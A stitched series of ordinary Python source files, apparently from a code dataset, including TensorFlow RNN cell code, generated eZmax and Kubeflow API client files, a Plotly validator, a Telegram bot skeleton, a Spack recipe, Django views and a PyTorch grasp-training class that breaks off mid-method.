LSTMStateTuple(num_units, num_proj)
if state_is_tuple else num_units + num_proj)
self._output_size = num_proj
else:
self._state_size = (
LSTMStateTuple(num_units, num_units)
if state_is_tuple else 2 * num_units)
self._output_size = num_units
@property
def state_size(self):
return self._state_size
@property
def output_size(self):
return self._output_size
def call(self, inputs, state):
"""Run one step of LSTM.
Args:
inputs: input Tensor, 2D, batch x num_units.
state: if `state_is_tuple` is False, this must be a state Tensor,
`2-D, batch x state_size`. If `state_is_tuple` is True, this must be a
tuple of state Tensors, both `2-D`, with column sizes `c_state` and
`m_state`.
Returns:
A tuple containing:
- A `2-D, [batch x output_dim]`, Tensor representing the output of the
LSTM after reading `inputs` when previous state was `state`.
Here output_dim is:
num_proj if num_proj was set,
num_units otherwise.
- Tensor(s) representing the new state of LSTM after reading `inputs` when
the previous state was `state`. Same type and shape(s) as `state`.
Raises:
ValueError: If input size cannot be inferred from inputs via
static shape inference.
"""
num_proj = self._num_units if self._num_proj is None else self._num_proj
sigmoid = math_ops.sigmoid
if self._state_is_tuple:
(c_prev, m_prev) = state
else:
c_prev = array_ops.slice(state, [0, 0], [-1, self._num_units])
m_prev = array_ops.slice(state, [0, self._num_units], [-1, num_proj])
dtype = inputs.dtype
input_size = inputs.get_shape().with_rank(2)[1]
if input_size.value is None:
raise ValueError("Could not infer input size from inputs.get_shape()[-1]")
scope = vs.get_variable_scope()
with vs.variable_scope(scope, initializer=self._initializer) as unit_scope:
if self._num_unit_shards is not None:
unit_scope.set_partitioner(
partitioned_variables.fixed_size_partitioner(
self._num_unit_shards))
# i = input_gate, j = new_input, f = forget_gate, o = output_gate
lstm_matrix = _linear([inputs, m_prev], 4 * self._num_units, bias=True)
i, j, f, o = array_ops.split(
value=lstm_matrix, num_or_size_splits=4, axis=1)
# Diagonal connections
if self._use_peepholes:
with vs.variable_scope(unit_scope) as projection_scope:
if self._num_unit_shards is not None:
projection_scope.set_partitioner(None)
w_f_diag = vs.get_variable(
"w_f_diag", shape=[self._num_units], dtype=dtype)
w_i_diag = vs.get_variable(
"w_i_diag", shape=[self._num_units], dtype=dtype)
w_o_diag = vs.get_variable(
"w_o_diag", shape=[self._num_units], dtype=dtype)
if self._use_peepholes:
c = (sigmoid(f + self._forget_bias + w_f_diag * c_prev) * c_prev +
sigmoid(i + w_i_diag * c_prev) * self._activation(j))
else:
c = (sigmoid(f + self._forget_bias) * c_prev + sigmoid(i) *
self._activation(j))
if self._cell_clip is not None:
# pylint: disable=invalid-unary-operand-type
c = clip_ops.clip_by_value(c, -self._cell_clip, self._cell_clip)
# pylint: enable=invalid-unary-operand-type
if self._use_peepholes:
m = sigmoid(o + w_o_diag * c) * self._activation(c)
else:
m = sigmoid(o) * self._activation(c)
if self._num_proj is not None:
with vs.variable_scope("projection") as proj_scope:
if self._num_proj_shards is not None:
proj_scope.set_partitioner(
partitioned_variables.fixed_size_partitioner(
self._num_proj_shards))
m = _linear(m, self._num_proj, bias=False)
if self._proj_clip is not None:
# pylint: disable=invalid-unary-operand-type
m = clip_ops.clip_by_value(m, -self._proj_clip, self._proj_clip)
# pylint: enable=invalid-unary-operand-type
new_state = (LSTMStateTuple(c, m) if self._state_is_tuple else
array_ops.concat([c, m], 1))
return m, new_state
def _enumerated_map_structure(map_fn, *args, **kwargs):
ix = [0]
def enumerated_fn(*inner_args, **inner_kwargs):
r = map_fn(ix[0], *inner_args, **inner_kwargs)
ix[0] += 1
return r
return nest.map_structure(enumerated_fn, *args, **kwargs)
class DropoutWrapper(RNNCell):
"""Operator adding dropout to inputs and outputs of the given cell."""
def __init__(self, cell, input_keep_prob=1.0, output_keep_prob=1.0,
state_keep_prob=1.0, variational_recurrent=False,
input_size=None, dtype=None, seed=None):
"""Create a cell with added input, state, and/or output dropout.
If `variational_recurrent` is set to `True` (**NOT** the default behavior),
then the the same dropout mask is applied at every step, as described in:
Y. Gal, Z Ghahramani. "A Theoretically Grounded Application of Dropout in
Recurrent Neural Networks". https://arxiv.org/abs/1512.05287
Otherwise a different dropout mask is applied at every time step.
Args:
cell: an RNNCell, a projection to output_size is added to it.
input_keep_prob: unit Tensor or float between 0 and 1, input keep
probability; if it is constant and 1, no input dropout will be added.
output_keep_prob: unit Tensor or float between 0 and 1, output keep
probability; if it is constant and 1, no output dropout will be added.
state_keep_prob: unit Tensor or float between 0 and 1, output keep
probability; if it is constant and 1, no output dropout will be added.
State dropout is performed on the *output* states of the cell.
variational_recurrent: Python bool. If `True`, then the same
dropout pattern is applied across all time steps per run call.
If this parameter is set, `input_size` **must** be provided.
input_size: (optional) (possibly nested tuple of) `TensorShape` objects
containing the depth(s) of the input tensors expected to be passed in to
the `DropoutWrapper`. Required and used **iff**
`variational_recurrent = True` and `input_keep_prob < 1`.
dtype: (optional) The `dtype` of the input, state, and output tensors.
Required and used **iff** `variational_recurrent = True`.
seed: (optional) integer, the randomness seed.
Raises:
TypeError: if cell is not an RNNCell.
ValueError: if any of the keep_probs are not between 0 and 1.
"""
if not _like_rnncell(cell):
raise TypeError("The parameter cell is not a RNNCell.")
with ops.name_scope("DropoutWrapperInit"):
def tensor_and_const_value(v):
tensor_value = ops.convert_to_tensor(v)
const_value = tensor_util.constant_value(tensor_value)
return (tensor_value, const_value)
for prob, attr in [(input_keep_prob, "input_keep_prob"),
(state_keep_prob, "state_keep_prob"),
(output_keep_prob, "output_keep_prob")]:
tensor_prob, const_prob = tensor_and_const_value(prob)
if const_prob is not None:
if const_prob < 0 or const_prob > 1:
raise ValueError("Parameter %s must be between 0 and 1: %d"
% (attr, const_prob))
setattr(self, "_%s" % attr, float(const_prob))
else:
setattr(self, "_%s" % attr, tensor_prob)
# Set cell, variational_recurrent, seed before running the code below
self._cell = cell
self._variational_recurrent = variational_recurrent
self._seed = seed
self._recurrent_input_noise = None
self._recurrent_state_noise = None
self._recurrent_output_noise = None
if variational_recurrent:
if dtype is None:
raise ValueError(
"When variational_recurrent=True, dtype must be provided")
def convert_to_batch_shape(s):
# Prepend a 1 for the batch dimension; for recurrent
# variational dropout we use the same dropout mask for all
# batch elements.
return array_ops.concat(
([1], tensor_shape.TensorShape(s).as_list()), 0)
def batch_noise(s, inner_seed):
shape = convert_to_batch_shape(s)
return random_ops.random_uniform(shape, seed=inner_seed, dtype=dtype)
if (not isinstance(self._input_keep_prob, numbers.Real) or
self._input_keep_prob < 1.0):
if input_size is None:
raise ValueError(
"When variational_recurrent=True and input_keep_prob < 1.0 or "
"is unknown, input_size must be provided")
self._recurrent_input_noise = _enumerated_map_structure(
lambda i, s: batch_noise(s, inner_seed=self._gen_seed("input", i)),
input_size)
self._recurrent_state_noise = _enumerated_map_structure(
lambda i, s: batch_noise(s, inner_seed=self._gen_seed("state", i)),
cell.state_size)
self._recurrent_output_noise = _enumerated_map_structure(
lambda i, s: batch_noise(s, inner_seed=self._gen_seed("output", i)),
cell.output_size)
def _gen_seed(self, salt_prefix, index):
if self._seed is None:
return None
salt = "%s_%d" % (salt_prefix, index)
string = (str(self._seed) + salt).encode("utf-8")
return int(hashlib.md5(string).hexdigest()[:8], 16) & 0x7FFFFFFF
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._cell.output_size
def zero_state(self, batch_size, dtype):
with ops.name_scope(type(self).__name__ + "ZeroState", values=[batch_size]):
return self._cell.zero_state(batch_size, dtype)
def _variational_recurrent_dropout_value(
self, index, value, noise, keep_prob):
"""Performs dropout given the pre-calculated noise tensor."""
# uniform [keep_prob, 1.0 + keep_prob)
random_tensor = keep_prob + noise
# 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
binary_tensor = math_ops.floor(random_tensor)
ret = math_ops.div(value, keep_prob) * binary_tensor
ret.set_shape(value.get_shape())
return ret
def _dropout(self, values, salt_prefix, recurrent_noise, keep_prob):
"""Decides whether to perform standard dropout or recurrent dropout."""
if not self._variational_recurrent:
def dropout(i, v):
return nn_ops.dropout(
v, keep_prob=keep_prob, seed=self._gen_seed(salt_prefix, i))
return _enumerated_map_structure(dropout, values)
else:
def dropout(i, v, n):
return self._variational_recurrent_dropout_value(i, v, n, keep_prob)
return _enumerated_map_structure(dropout, values, recurrent_noise)
def __call__(self, inputs, state, scope=None):
"""Run the cell with the declared dropouts."""
def _should_dropout(p):
return (not isinstance(p, float)) or p < 1
if _should_dropout(self._input_keep_prob):
inputs = self._dropout(inputs, "input",
self._recurrent_input_noise,
self._input_keep_prob)
output, new_state = self._cell(inputs, state, scope)
if _should_dropout(self._state_keep_prob):
new_state = self._dropout(new_state, "state",
self._recurrent_state_noise,
self._state_keep_prob)
if _should_dropout(self._output_keep_prob):
output = self._dropout(output, "output",
self._recurrent_output_noise,
self._output_keep_prob)
return output, new_state
class ResidualWrapper(RNNCell):
"""RNNCell wrapper that ensures cell inputs are added to the outputs."""
def __init__(self, cell):
"""Constructs a `ResidualWrapper` for `cell`.
Args:
cell: An instance of `RNNCell`.
"""
self._cell = cell
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._cell.output_size
def zero_state(self, batch_size, dtype):
with ops.name_scope(type(self).__name__ + "ZeroState", values=[batch_size]):
return self._cell.zero_state(batch_size, dtype)
def __call__(self, inputs, state, scope=None):
"""Run the cell and add its inputs to its outputs.
Args:
inputs: cell inputs.
state: cell state.
scope: optional cell scope.
Returns:
Tuple of cell outputs and new state.
Raises:
TypeError: If cell inputs and outputs have different structure (type).
ValueError: If cell inputs and outputs have different structure (value).
"""
outputs, new_state = self._cell(inputs, state, scope=scope)
nest.assert_same_structure(inputs, outputs)
# Ensure shapes match
def assert_shape_match(inp, out):
inp.get_shape().assert_is_compatible_with(out.get_shape())
nest.map_structure(assert_shape_match, inputs, outputs)
res_outputs = nest.map_structure(
lambda inp, out: inp + out, inputs, outputs)
return (res_outputs, new_state)
class DeviceWrapper(RNNCell):
"""Operator that ensures an RNNCell runs on a particular device."""
def __init__(self, cell, device):
"""Construct a `DeviceWrapper` for `cell` with device `device`.
Ensures the wrapped `cell` is called with `tf.device(device)`.
Args:
cell: An instance of `RNNCell`.
device: A device string or function, for passing to `tf.device`.
"""
self._cell = cell
self._device = device
@property
def state_size(self):
return self._cell.state_size
@property
def output_size(self):
return self._cell.output_size
def zero_state(self, batch_size, dtype):
with ops.name_scope(type(self).__name__ + "ZeroState", values=[batch_size]):
with ops.device(self._device):
return self._cell.zero_state(batch_size, dtype)
def __call__(self, inputs, state, scope=None):
"""Run the cell on specified device."""
with ops.device(self._device):
return self._cell(inputs, state, scope=scope)
class MultiRNNCell(RNNCell):
"""RNN cell composed sequentially of multiple simple cells."""
def __init__(self, cells, state_is_tuple=True):
"""Create a RNN cell composed sequentially of a number of RNNCells.
Args:
cells: list of RNNCells that will be composed in this order.
state_is_tuple: If True, accepted and returned states are n-tuples, where
`n = len(cells)`. If False, the states are all
concatenated along the column axis. This latter behavior will soon be
deprecated.
Raises:
ValueError: if cells is empty (not allowed), or at least one of the cells
returns a state tuple but the flag `state_is_tuple` is `False`.
"""
super(MultiRNNCell, self).__init__()
if not cells:
raise ValueError("Must specify at least one cell for MultiRNNCell.")
if not nest.is_sequence(cells):
raise TypeError(
"cells must be a list or tuple, but saw: %s." % cells)
self._cells = cells
self._state_is_tuple = state_is_tuple
if not state_is_tuple:
if any(nest.is_sequence(c.state_size) for c in self._cells):
raise ValueError("Some cells return tuples of states, but the flag "
"state_is_tuple is not set. State sizes are: %s"
% str([c.state_size for c in self._cells]))
@property
def state_size(self):
if self._state_is_tuple:
return tuple(cell.state_size for cell in self._cells)
else:
return sum([cell.state_size for cell in self._cells])
@property
def output_size(self):
return self._cells[-1].output_size
def zero_state(self, batch_size, dtype):
with ops.name_scope(type(self).__name__ + "ZeroState", values=[batch_size]):
if self._state_is_tuple:
return tuple(cell.zero_state(batch_size, dtype) for cell in self._cells)
else:
# We know here that state_size of each cell is not a tuple and
# presumably does not contain TensorArrays or anything else fancy
return super(MultiRNNCell, self).zero_state(batch_size, dtype)
def call(self, inputs, state):
"""Run this multi-layer cell on inputs, starting from state."""
cur_state_pos = 0
cur_inp = inputs
new_states = []
for i, cell in enumerate(self._cells):
with vs.variable_scope("cell_%d" % i):
if self._state_is_tuple:
if not nest.is_sequence(state):
raise ValueError(
"Expected state to be a tuple of length %d, but received: %s" %
(len(self.state_size), state))
cur_state = state[i]
else:
cur_state = array_ops.slice(state, [0, cur_state_pos],
[-1, cell.state_size])
cur_state_pos += cell.state_size
cur_inp, new_state = cell(cur_inp, cur_state)
new_states.append(new_state)
new_states = (tuple(new_states) if self._state_is_tuple else
array_ops.concat(new_states, 1))
return cur_inp, new_states
class _SlimRNNCell(RNNCell):
"""A simple wrapper for slim.rnn_cells."""
def __init__(self, cell_fn):
"""Create a SlimRNNCell from a cell_fn.
Args:
cell_fn: a function which takes (inputs, state, scope) and produces the
outputs and the new_state. Additionally when called with inputs=None and
state=None it should return (initial_outputs, initial_state).
Raises:
TypeError: if cell_fn is not callable
ValueError: if cell_fn cannot produce a valid initial state.
"""
if not callable(cell_fn):
raise TypeError("cell_fn %s needs to be callable", cell_fn)
self._cell_fn = cell_fn
self._cell_name = cell_fn.func.__name__
init_output, init_state = self._cell_fn(None, None)
output_shape = init_output.get_shape()
state_shape = init_state.get_shape()
self._output_size = output_shape.with_rank(2)[1].value
self._state_size = state_shape.with_rank(2)[1].value
if self._output_size is None:
raise ValueError("Initial output created by %s has invalid shape %s" %
(self._cell_name, output_shape))
if self._state_size is None:
raise ValueError("Initial state created by %s has invalid shape %s" %
(self._cell_name, state_shape))
@property
def state_size(self):
return self._state_size
@property
def output_size(self):
return self._output_size
def __call__(self, inputs, state, scope=None):
scope = scope or self._cell_name
output, state = self._cell_fn(inputs, state, scope=scope)
return output, state
def _linear(args,
output_size,
bias,
bias_initializer=None,
kernel_initializer=None):
"""Linear map: sum_i(args[i] * W[i]), where W[i] is a variable.
Args:
args: a 2D Tensor or a list of 2D, batch x n, Tensors.
output_size: int, second dimension of W[i].
bias: boolean, whether to add a bias term or not.
bias_initializer: starting value to initialize the bias
(default is all zeros).
kernel_initializer: starting value to initialize the weight.
Returns:
A 2D Tensor with shape [batch x output_size] equal to
sum_i(args[i] * W[i]), where W[i]s are newly created matrices.
Raises:
ValueError: if some of the arguments has unspecified or wrong shape.
"""
if args is None or (nest.is_sequence(args) and not args):
raise ValueError("`args` must be specified")
if not nest.is_sequence(args):
args = [args]
# Calculate the total size of arguments on dimension 1.
total_arg_size = 0
shapes = [a.get_shape() for a in args]
for shape in shapes:
if shape.ndims != 2:
raise ValueError("linear is expecting 2D arguments: %s" % shapes)
if shape[1].value is None:
raise ValueError("linear expects shape[1] to be provided for shape %s, "
"but saw %s" % (shape, shape[1]))
else:
total_arg_size += shape[1].value
dtype = [a.dtype for a in args][0]
# Now the computation.
scope = vs.get_variable_scope()
with vs.variable_scope(scope) as outer_scope:
weights = vs.get_variable(
_WEIGHTS_VARIABLE_NAME, [total_arg_size, output_size],
dtype=dtype,
initializer=kernel_initializer)
if len(args) == 1:
res = math_ops.matmul(args[0], weights)
else:
res = math_ops.matmul(array_ops.concat(args, 1), weights)
if not bias:
return res
with vs.variable_scope(outer_scope) as inner_scope:
inner_scope.set_partitioner(None)
if bias_initializer is None:
bias_initializer = init_ops.constant_initializer(0.0, dtype=dtype)
biases = vs.get_variable(
_BIAS_VARIABLE_NAME, [output_size],
dtype=dtype,
initializer=bias_initializer)
return nn_ops.bias_add(res, biases)
| 38.618587
| 80
| 0.67869
|
f3b811259dbb33b3cd8e5587c98111771a606b28
| 1,772
|
py
|
Python
|
test/test_ezsignfolder_create_object_v2_response.py
|
ezmaxinc/eZmax-SDK-python
|
6794b8001abfb7d9ae18a3b87aba164839b925a0
|
[
"MIT"
] | null | null | null |
test/test_ezsignfolder_create_object_v2_response.py
|
ezmaxinc/eZmax-SDK-python
|
6794b8001abfb7d9ae18a3b87aba164839b925a0
|
[
"MIT"
] | null | null | null |
test/test_ezsignfolder_create_object_v2_response.py
|
ezmaxinc/eZmax-SDK-python
|
6794b8001abfb7d9ae18a3b87aba164839b925a0
|
[
"MIT"
] | null | null | null |
"""
eZmax API Definition (Full)
This API expose all the functionnalities for the eZmax and eZsign applications. # noqa: E501
The version of the OpenAPI document: 1.1.7
Contact: support-api@ezmax.ca
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import eZmaxApi
from eZmaxApi.model.common_response import CommonResponse
from eZmaxApi.model.common_response_obj_debug import CommonResponseObjDebug
from eZmaxApi.model.common_response_obj_debug_payload import CommonResponseObjDebugPayload
from eZmaxApi.model.ezsignfolder_create_object_v2_response_all_of import EzsignfolderCreateObjectV2ResponseAllOf
from eZmaxApi.model.ezsignfolder_create_object_v2_response_m_payload import EzsignfolderCreateObjectV2ResponseMPayload
globals()['CommonResponse'] = CommonResponse
globals()['CommonResponseObjDebug'] = CommonResponseObjDebug
globals()['CommonResponseObjDebugPayload'] = CommonResponseObjDebugPayload
globals()['EzsignfolderCreateObjectV2ResponseAllOf'] = EzsignfolderCreateObjectV2ResponseAllOf
globals()['EzsignfolderCreateObjectV2ResponseMPayload'] = EzsignfolderCreateObjectV2ResponseMPayload
from eZmaxApi.model.ezsignfolder_create_object_v2_response import EzsignfolderCreateObjectV2Response
class TestEzsignfolderCreateObjectV2Response(unittest.TestCase):
"""EzsignfolderCreateObjectV2Response unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testEzsignfolderCreateObjectV2Response(self):
"""Test EzsignfolderCreateObjectV2Response"""
# FIXME: construct object with mandatory attributes with example values
# model = EzsignfolderCreateObjectV2Response() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 37.702128
| 118
| 0.813205
|
62213a32f7d6e3af24125276dea70501044d88cb
| 5,059
|
py
|
Python
|
backend/api/python_http_client/kfp_server_api/models/api_pipeline_runtime.py
|
Iuiu1234/pipelines
|
1e032f550ce23cd40bfb6827b995248537b07d08
|
[
"Apache-2.0"
] | 2,860
|
2018-05-24T04:55:01.000Z
|
2022-03-31T13:49:56.000Z
|
backend/api/python_http_client/kfp_server_api/models/api_pipeline_runtime.py
|
Iuiu1234/pipelines
|
1e032f550ce23cd40bfb6827b995248537b07d08
|
[
"Apache-2.0"
] | 7,331
|
2018-05-16T09:03:26.000Z
|
2022-03-31T23:22:04.000Z
|
backend/api/python_http_client/kfp_server_api/models/api_pipeline_runtime.py
|
Iuiu1234/pipelines
|
1e032f550ce23cd40bfb6827b995248537b07d08
|
[
"Apache-2.0"
] | 1,359
|
2018-05-15T11:05:41.000Z
|
2022-03-31T09:42:09.000Z
|
# coding: utf-8
"""
Kubeflow Pipelines API
This file contains REST API specification for Kubeflow Pipelines. The file is autogenerated from the swagger definition.
Contact: kubeflow-pipelines@google.com
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kfp_server_api.configuration import Configuration
class ApiPipelineRuntime(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'pipeline_manifest': 'str',
'workflow_manifest': 'str'
}
attribute_map = {
'pipeline_manifest': 'pipeline_manifest',
'workflow_manifest': 'workflow_manifest'
}
def __init__(self, pipeline_manifest=None, workflow_manifest=None, local_vars_configuration=None): # noqa: E501
"""ApiPipelineRuntime - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._pipeline_manifest = None
self._workflow_manifest = None
self.discriminator = None
if pipeline_manifest is not None:
self.pipeline_manifest = pipeline_manifest
if workflow_manifest is not None:
self.workflow_manifest = workflow_manifest
@property
def pipeline_manifest(self):
"""Gets the pipeline_manifest of this ApiPipelineRuntime. # noqa: E501
Output. The runtime JSON manifest of the pipeline, including the status of pipeline steps and fields need for UI visualization etc. # noqa: E501
:return: The pipeline_manifest of this ApiPipelineRuntime. # noqa: E501
:rtype: str
"""
return self._pipeline_manifest
@pipeline_manifest.setter
def pipeline_manifest(self, pipeline_manifest):
"""Sets the pipeline_manifest of this ApiPipelineRuntime.
Output. The runtime JSON manifest of the pipeline, including the status of pipeline steps and fields need for UI visualization etc. # noqa: E501
:param pipeline_manifest: The pipeline_manifest of this ApiPipelineRuntime. # noqa: E501
:type pipeline_manifest: str
"""
self._pipeline_manifest = pipeline_manifest
@property
def workflow_manifest(self):
"""Gets the workflow_manifest of this ApiPipelineRuntime. # noqa: E501
Output. The runtime JSON manifest of the argo workflow. This is deprecated after pipeline_runtime_manifest is in use. # noqa: E501
:return: The workflow_manifest of this ApiPipelineRuntime. # noqa: E501
:rtype: str
"""
return self._workflow_manifest
@workflow_manifest.setter
def workflow_manifest(self, workflow_manifest):
"""Sets the workflow_manifest of this ApiPipelineRuntime.
Output. The runtime JSON manifest of the argo workflow. This is deprecated after pipeline_runtime_manifest is in use. # noqa: E501
:param workflow_manifest: The workflow_manifest of this ApiPipelineRuntime. # noqa: E501
:type workflow_manifest: str
"""
self._workflow_manifest = workflow_manifest
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApiPipelineRuntime):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ApiPipelineRuntime):
return True
return self.to_dict() != other.to_dict()
| 33.503311
| 153
| 0.638268
|
437dc879e8034c5dbe420c44e159c2202a0167bb
| 469
|
py
|
Python
|
env/lib/python3.8/site-packages/plotly/validators/cone/hoverlabel/_bgcolorsrc.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 76
|
2020-07-06T14:44:05.000Z
|
2022-02-14T15:30:21.000Z
|
env/lib/python3.8/site-packages/plotly/validators/cone/hoverlabel/_bgcolorsrc.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11
|
2020-08-09T02:30:14.000Z
|
2022-03-12T00:50:14.000Z
|
env/lib/python3.8/site-packages/plotly/validators/cone/hoverlabel/_bgcolorsrc.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11
|
2020-07-12T16:18:07.000Z
|
2022-02-05T16:48:35.000Z
|
import _plotly_utils.basevalidators
class BgcolorsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="bgcolorsrc", parent_name="cone.hoverlabel", **kwargs
):
super(BgcolorsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
| 31.266667
| 79
| 0.641791
|
05bd6f2d1b5e9b2f961020bac59b10441bf13da9
| 515
|
py
|
Python
|
bot.py
|
Exganza/TelBot-init
|
aba70d10e2f326cd74943826db7122444d078c0f
|
[
"MIT"
] | null | null | null |
bot.py
|
Exganza/TelBot-init
|
aba70d10e2f326cd74943826db7122444d078c0f
|
[
"MIT"
] | null | null | null |
bot.py
|
Exganza/TelBot-init
|
aba70d10e2f326cd74943826db7122444d078c0f
|
[
"MIT"
] | null | null | null |
import telebot
import time
# API_TOKEN
bot_token = '*******************************'
bot = telebot.TeleBot(token=bot_token)
@bot.message_handler(commands=['start'])
def send_welcome(message):
pass
@bot.message_handler(commands=['help'])
def send_welcome(message):
pass
# Handle normal messages
@bot.message_handler(func=lambda msg: msg.text is not None)
def at_bot(message):
text = message.text
while True:
try:
bot.polling()
except Exception:
time.sleep(15)
| 17.758621
| 59
| 0.642718
|
782f0f859e8e23374f1fdaff5f7ad9a9917ad4a2
| 618
|
py
|
Python
|
balance/views.py
|
dagolap/liquidator-backend
|
542470db6a0169533f402c9f82ae4d9dd7f47b23
|
[
"MIT"
] | null | null | null |
balance/views.py
|
dagolap/liquidator-backend
|
542470db6a0169533f402c9f82ae4d9dd7f47b23
|
[
"MIT"
] | null | null | null |
balance/views.py
|
dagolap/liquidator-backend
|
542470db6a0169533f402c9f82ae4d9dd7f47b23
|
[
"MIT"
] | null | null | null |
from base.views import RetrieveCreateUpdateDestroyView, ByDateRangeView, RetrieveView
from base.mixins import CompanyFilterMixin
from .models import BankBalance
from .serializers import BankBalanceSerializer
class BankBalanceMixin(CompanyFilterMixin):
lookup_field = 'id'
queryset = BankBalance.objects.all()
serializer_class = BankBalanceSerializer
class BankBalanceView(BankBalanceMixin, RetrieveCreateUpdateDestroyView):
pass
class BankBalanceByDateView(BankBalanceMixin, RetrieveView):
lookup_field = 'date'
class BankBalanceByDateRangeView(BankBalanceMixin, ByDateRangeView):
pass
| 26.869565
| 85
| 0.825243
|
71a570895559608007c55310e2ab5afb055181ac
| 830
|
py
|
Python
|
var/spack/repos/builtin/packages/bitmap/package.py
|
whitfin/spack
|
aabd2be31a511d0e00c1017f7311a421659319d9
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 3
|
2019-06-27T13:26:50.000Z
|
2019-07-01T16:24:54.000Z
|
var/spack/repos/builtin/packages/bitmap/package.py
|
openbiox/spack
|
bb6ec7fb40c14b37e094a860e3625af53f633174
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 75
|
2016-07-27T11:43:00.000Z
|
2020-12-08T15:56:53.000Z
|
var/spack/repos/builtin/packages/bitmap/package.py
|
openbiox/spack
|
bb6ec7fb40c14b37e094a860e3625af53f633174
|
[
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 8
|
2015-10-16T13:51:49.000Z
|
2021-10-18T13:58:03.000Z
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Bitmap(AutotoolsPackage):
"""bitmap, bmtoa, atobm - X bitmap (XBM) editor and converter utilities."""
homepage = "http://cgit.freedesktop.org/xorg/app/bitmap"
url = "https://www.x.org/archive/individual/app/bitmap-1.0.8.tar.gz"
version('1.0.8', '0ca600041bb0836ae7c9f5db5ce09091')
depends_on('libx11')
depends_on('libxmu')
depends_on('libxaw')
depends_on('libxmu')
depends_on('libxt')
depends_on('xbitmaps', type='build')
depends_on('xproto@7.0.25:', type='build')
depends_on('pkgconfig', type='build')
depends_on('util-macros', type='build')
| 30.740741
| 79
| 0.692771
|
de00015354650ec88b78255ae55907962f625326
| 4,285
|
py
|
Python
|
trainer_grasp.py
|
wenbowen123/catgrasp
|
4b2f4016fc40e8aad1f157267c460ce333dec7ad
|
[
"Apache-2.0",
"MIT"
] | 44
|
2022-03-05T00:47:18.000Z
|
2022-03-31T11:12:02.000Z
|
trainer_grasp.py
|
wenbowen123/catgrasp
|
4b2f4016fc40e8aad1f157267c460ce333dec7ad
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
trainer_grasp.py
|
wenbowen123/catgrasp
|
4b2f4016fc40e8aad1f157267c460ce333dec7ad
|
[
"Apache-2.0",
"MIT"
] | 9
|
2022-03-22T08:02:10.000Z
|
2022-03-28T10:49:06.000Z
|
import os.path
import numpy as np
import os,sys,copy,time,cv2,tqdm
from scipy.signal import convolve2d
code_dir = os.path.dirname(os.path.realpath(__file__))
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.optim.lr_scheduler import StepLR
import torchvision
from PIL import Image
from dataset_grasp import *
from pointnet2 import *
class TrainerGrasp:
def __init__(self,cfg):
self.cfg = cfg
self.epoch = 0
self.best_train = 1e9
self.best_val = 1e9
self.train_data = GraspDataset(self.cfg,phase='train')
self.val_data = GraspDataset(self.cfg,phase='val')
self.train_loader = torch.utils.data.DataLoader(self.train_data, batch_size=self.cfg['batch_size'], shuffle=True, num_workers=self.cfg['n_workers'], pin_memory=False, drop_last=True,worker_init_fn=worker_init_fn)
self.val_loader = torch.utils.data.DataLoader(self.val_data, batch_size=self.cfg['batch_size'], shuffle=True, num_workers=self.cfg['n_workers'], pin_memory=False, drop_last=False,worker_init_fn=worker_init_fn)
self.model = PointNetCls(n_in=self.cfg['input_channel'],n_out=len(self.cfg['classes'])-1)
self.model = nn.DataParallel(self.model)
self.model.cuda()
start_lr = self.cfg['start_lr']/64*self.cfg['batch_size']
if self.cfg['optimizer_type']=='adam':
self.optimizer = optim.Adam(filter(lambda p: p.requires_grad, self.model.parameters()), lr=start_lr, weight_decay=self.cfg['weight_decay'], betas=(0.9, 0.99), amsgrad=False)
elif self.cfg['optimizer_type']=='sgd':
self.optimizer = optim.SGD(filter(lambda p: p.requires_grad, self.model.parameters()), lr=start_lr,weight_decay=self.cfg['weight_decay'], momentum=0.9)
self.scheduler = torch.optim.lr_scheduler.MultiStepLR(self.optimizer, milestones=self.cfg['lr_milestones'], gamma=0.1)
def train_loop(self):
self.model.train()
avg_loss = []
for iter, batch in enumerate(self.train_loader):
input_data = batch['input'].cuda().float()
score = batch['score'].cuda().float()
pred, l4_points = self.model(input_data)
